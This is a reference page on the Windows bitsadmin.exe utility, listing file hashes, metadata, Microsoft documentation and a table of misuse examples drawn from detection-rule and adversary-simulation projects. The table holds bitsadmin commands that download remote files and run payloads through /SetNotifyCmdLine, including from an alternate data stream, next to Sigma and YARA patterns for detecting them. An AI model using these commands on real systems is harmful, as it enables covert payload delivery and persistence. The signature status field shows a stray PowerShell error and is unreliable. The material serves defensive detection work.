bitsadmin.exe

File Path: C:\windows\system32\bitsadmin.exe
Description: BITS administration utility

Hashes

Type	Hash
MD5	`707D3D8A2A2F1B8923C383AEF6370AF7`
SHA1	`E48D8F65375D067E2903C928C4388DBFCFABBDD3`
SHA256	`8F3F9E882E4DB13860AE240D6F988D39B641B2AE50F21462BA320993445EEBB8`
SHA384	`2CDE4F144325C9108299D8403633AEA8D3DFFEF863BE01F3036F1E152F0B5FD449830F8CF4701F21B6082B2A1227A6B1`
SHA512	`B5EAFEC362576C804D7B194BB85067DAAFD6294A373FBE009A5D49D473A84584E9082FBB44708A8C9530EE4CD6DF6A14D070803BC5401BFC85A8EDBB414889C7`
SSDEEP	`3072:Z/+YmZndZetIq4QJkSejZ1pMXMCSDw1wpbDORVjW1Xy72WbrODud5q0oSu/2PUG:otQJkSe/kQKobDORVj48g/2`

Signature

Status: The file C:\windows\system32\bitsadmin.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
Serial: ``
Thumbprint: ``
Issuer:
Subject:

File Metadata

Original Filename: bitsadmin.exe.mui
Product Name: Microsoft Windows Operating System
Company Name: Microsoft Corporation
File Version: 7.7.9600.16384 (winblue_rtm.130821-1623)
Product Version: 7.7.9600.16384
Language: English (United States)
Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of bitsadmin.exe being misused. While bitsadmin.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	proxy_ua_bitsadmin_susp_tld.yml	`title: Bitsadmin to Uncommon TLD`	DRL 1.0
sigma	proxy_ua_bitsadmin_susp_tld.yml	`description: Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/`	DRL 1.0
sigma	proxy_ua_bitsadmin_susp_tld.yml	`- Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca`	DRL 1.0
sigma	win_bits_client_susp_use_bitsadmin.yml	`title: Suspicious Task Added by Bitsadmin`	DRL 1.0
sigma	win_bits_client_susp_use_bitsadmin.yml	`processPath\\|endswith: '\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_apt_greenbug_may20.yml	`- 'bitsadmin'`	DRL 1.0
sigma	proc_creation_win_bitsadmin_download.yml	`title: Bitsadmin Download`	DRL 1.0
sigma	proc_creation_win_bitsadmin_download.yml	`description: Detects usage of bitsadmin downloading a file`	DRL 1.0
sigma	proc_creation_win_bitsadmin_download.yml	`- https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin`	DRL 1.0
sigma	proc_creation_win_bitsadmin_download.yml	`- https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/`	DRL 1.0
sigma	proc_creation_win_bitsadmin_download.yml	`- '\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_bitsadmin_download.yml	`- 'copy bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_exploit_cve_2020_10189.yml	`- '\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_mmc_spawn_shell.yml	`- '\BITSADMIN'`	DRL 1.0
sigma	proc_creation_win_monitoring_for_persistence_via_bits.yml	`CommandLine\\|re: '(?i).bitsadmin.\/SetNotifyCmdLine.(%COMSPEC%\\|cmd.exe\\|regsvr32.exe).'`	DRL 1.0
sigma	proc_creation_win_monitoring_for_persistence_via_bits.yml	`CommandLine\\|re: '(?i).bitsadmin.\/Addfile.(http\\|https\\|ftp\\|ftps):.'`	DRL 1.0
sigma	proc_creation_win_mshta_spawn_shell.yml	`- '\BITSADMIN'`	DRL 1.0
sigma	proc_creation_win_powershell_bitsjob.yml	`title: Suspicious Bitsadmin Job via PowerShell`	DRL 1.0
sigma	proc_creation_win_public_folder_parent.yml	`- 'bitsadmin'`	DRL 1.0
sigma	proc_creation_win_shell_spawn_susp_program.yml	`- '\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_by_java.yml	`- '\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_by_java_keytool.yml	`- '\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_from_mssql.yml	`- '\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_susp_shell_spawn_from_winrm.yml	`- '*\bitsadmin.exe'`	DRL 1.0
sigma	proc_creation_win_susp_spoolsv_child_processes.yml	`- \bitsadmin.exe`	DRL 1.0
sigma	proc_creation_win_webshell_spawn.yml	`- '\bitsadmin.exe'`	DRL 1.0
LOLBAS	Bitsadmin.yml	`Name: Bitsadmin.exe`
LOLBAS	Bitsadmin.yml	`- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1`
LOLBAS	Bitsadmin.yml	`Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.`
LOLBAS	Bitsadmin.yml	`- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1`
LOLBAS	Bitsadmin.yml	`Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.`
LOLBAS	Bitsadmin.yml	`- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset`
LOLBAS	Bitsadmin.yml	`- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset`
LOLBAS	Bitsadmin.yml	`Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.`
LOLBAS	Bitsadmin.yml	`- Path: C:\Windows\System32\bitsadmin.exe`
LOLBAS	Bitsadmin.yml	`- Path: C:\Windows\SysWOW64\bitsadmin.exe`
LOLBAS	Bitsadmin.yml	`- IOC: Child process from bitsadmin.exe`
LOLBAS	Bitsadmin.yml	`- IOC: bitsadmin creates new files`
LOLBAS	Bitsadmin.yml	`- IOC: bitsadmin adds data to alternate data stream`
atomic-red-team	index.md	- Atomic Test #1: Bitsadmin Download (cmd) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	index.md	- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #1: Bitsadmin Download (cmd) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]	MIT License. © 2018 Red Canary
atomic-red-team	windows-index.md	- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]	MIT License. © 2018 Red Canary
atomic-red-team	T1072.md	bitsadmin /transfer myDownloadJob /download /priority normal “https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi” #{radmin_installer}	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	- Atomic Test #9 - Windows - BITSAdmin BITS Download	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	## Atomic Test #9 - Windows - BITSAdmin BITS Download	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	- Atomic Test #1 - Bitsadmin Download (cmd)	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	- Atomic Test #2 - Bitsadmin Download (PowerShell)	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	## Atomic Test #1 - Bitsadmin Download (cmd)	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	This test simulates an adversary leveraging bitsadmin.exe to download	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	## Atomic Test #2 - Bitsadmin Download (PowerShell)	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	bitsadmin.exe /create #{bits_job_name}	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	bitsadmin.exe /resume #{bits_job_name}	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	bitsadmin.exe /complete #{bits_job_name}	MIT License. © 2018 Red Canary
atomic-red-team	T1560.001.md	bitsadmin /transfer myDownloadJob /download /priority normal “https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe” #{rar_installer}	MIT License. © 2018 Red Canary
atomic-red-team	T1560.001.md	bitsadmin /transfer myDownloadJob /download /priority normal “https://www.7-zip.org/a/7z2002-x64.exe” #{7zip_installer}	MIT License. © 2018 Red Canary
signature-base	apt_keyboys.yar	$x1 = “egsvr32.exe "/u bitsadmin /canceft\windows\currebitsadmin” ascii	CC BY-NC 4.0
signature-base	gen_github_net_redteam_tools_guids.yar	reference = “https://github.com/bitsadmin/nopowershell”	CC BY-NC 4.0
signature-base	gen_github_net_redteam_tools_guids.yar	reference = “https://github.com/bitsadmin/fakelogonscreen”	CC BY-NC 4.0
signature-base	gen_recon_indicators.yar	$s13 = “bitsadmin /rawreturn /transfer getfile” ascii	CC BY-NC 4.0
signature-base	thor-hacktools.yar	reference = “https://github.com/bitsadmin/nopowershell”	CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.

bitsadmin

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows 10

Bitsadmin is a command-line tool used to create, download or upload jobs, and to monitor their progress. The bitsadmin tool uses switches to identify the work to perform. You can call bitsadmin /? or bitsadmin /help to get a list of switches.

Most switches require a <job> parameter, which you set to the job’s display name, or GUID. A job’s display name doesn’t have to be unique. The /create and /list switches return a job’s GUID.

By default, you can access information about your own jobs. To access information for another user’s jobs, you must have administrator privileges. If the job was created in an elevated state, then you must run bitsadmin from an elevated window; otherwise, you’ll have read-only access to the job.

Many of the switches correspond to methods in the BITS interfaces. For additional details that may be relevant to using a switch, see the corresponding method.

Use the following switches to create a job, set and retrieve the properties of a job, and monitor the status of a job. For examples that show how to use some of these switches to perform tasks, see bitsadmin examples.